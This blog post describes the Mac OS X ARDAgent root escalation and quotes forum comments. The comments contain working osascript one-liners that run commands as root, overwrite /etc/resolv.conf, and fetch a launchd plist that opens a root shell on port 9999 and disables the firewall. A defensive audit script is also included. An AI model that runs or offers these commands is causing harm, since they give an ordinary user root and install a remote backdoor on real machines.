Zero Day: OS X ARD Agent Root Escalation Vulnerability

This is scary. I’ve tried it and it works perfectly. And now a new OS X trojan is on the loose exploiting this vulnerability.

So, what is this all about? Usually, malware on a Mac requires root privileges to get installed, just like DNSChanger. But in this case, by exploiting the Apple Remote Desktop (ARD) Agent vulnerability, an ordinary user can bypass that requirement and gain root access.

This zero-day vulnerability was actively discussed in this thread, where an anonymous reader writes:

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching. Secure? I think not.”

Worse, another contributor in this thread spells out the real danger of this exploit.


Disconfirmed – I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here’s an example:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl "'

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

To remove, run 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'.

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.
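A defender-side audit for the two things the comment above relies on, added here as an example (it is not code from the thread or from Apple): it reports whether the ARDAgent binary still carries the setuid bit, and it flags LaunchDaemon plists that break the root-owned, mode 644 norm, which is how the mode-600 bash.plist dropped above would stand out. The ARDAgent path is assumed to be the standard 10.4/10.5 location, and clearing its setuid bit is the workaround that circulated before Apple shipped a fix.

```shell
#!/bin/sh
# Added example: audit the two conditions the thread relies on. Not from the
# original post. ASSUMPTION: ARDAgent lives at the path below (10.4/10.5 layout).
ARDAGENT="/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"

# Owner uid of a file; ls -ln is portable where stat's flags differ (macOS vs Linux).
owner_uid() { ls -ln "$1" | awk '{print $3}'; }

# Succeeds when the file carries the setuid bit. For a root-owned ARDAgent this
# is exactly what turns "do shell script" into a root shell.
file_is_setuid() { [ -u "$1" ]; }

# Prints launchd plists in DIR that deviate from the root-owned, -rw-r--r-- norm
# of /System/Library/LaunchDaemons. The comment's persistence step drops a
# mode-600 bash.plist there, which this reports.
# Usage: find_odd_plists DIR [EXPECTED_OWNER_UID]   (uid defaults to 0)
find_odd_plists() {
    dir="$1"; want_uid="${2:-0}"
    for p in "$dir"/*.plist; do
        [ -e "$p" ] || continue
        # keep the 10 mode characters; macOS/Linux may append '@', '+' or '.'
        mode=$(ls -ln "$p" | awk '{print $1}' | cut -c1-10)
        if [ "$mode" != "-rw-r--r--" ] || [ "$(owner_uid "$p")" != "$want_uid" ]; then
            printf '%s\n' "$p"
        fi
    done
    return 0
}

# Returns 0 only when ARDAgent is not setuid and no odd plists are present.
# Usage: ardagent_audit [AGENT_PATH] [LAUNCHDAEMONS_DIR] [EXPECTED_OWNER_UID]
ardagent_audit() {
    agent="${1:-$ARDAGENT}"; ldir="${2:-/System/Library/LaunchDaemons}"; rc=0
    if [ -e "$agent" ] && file_is_setuid "$agent"; then
        echo "WARN: $agent is setuid (owner uid $(owner_uid "$agent"))"
        echo "      2008-era workaround: chmod u-s \"$agent\" (as root)"
        rc=1
    fi
    odd=$(find_odd_plists "$ldir" "${3:-0}")
    if [ -n "$odd" ]; then
        echo "WARN: LaunchDaemons with unusual owner or mode:"
        printf '%s\n' "$odd"
        rc=1
    fi
    return $rc
}
```

Run `ardagent_audit` with no arguments on the machine itself; the optional arguments exist so the checks can be exercised against a scratch directory.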


I’ve got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"'
% cat /etc/resolv.conf
Nasty Content


Security is like sex. Once you’re penetrated you’re ****ed. By AppleKid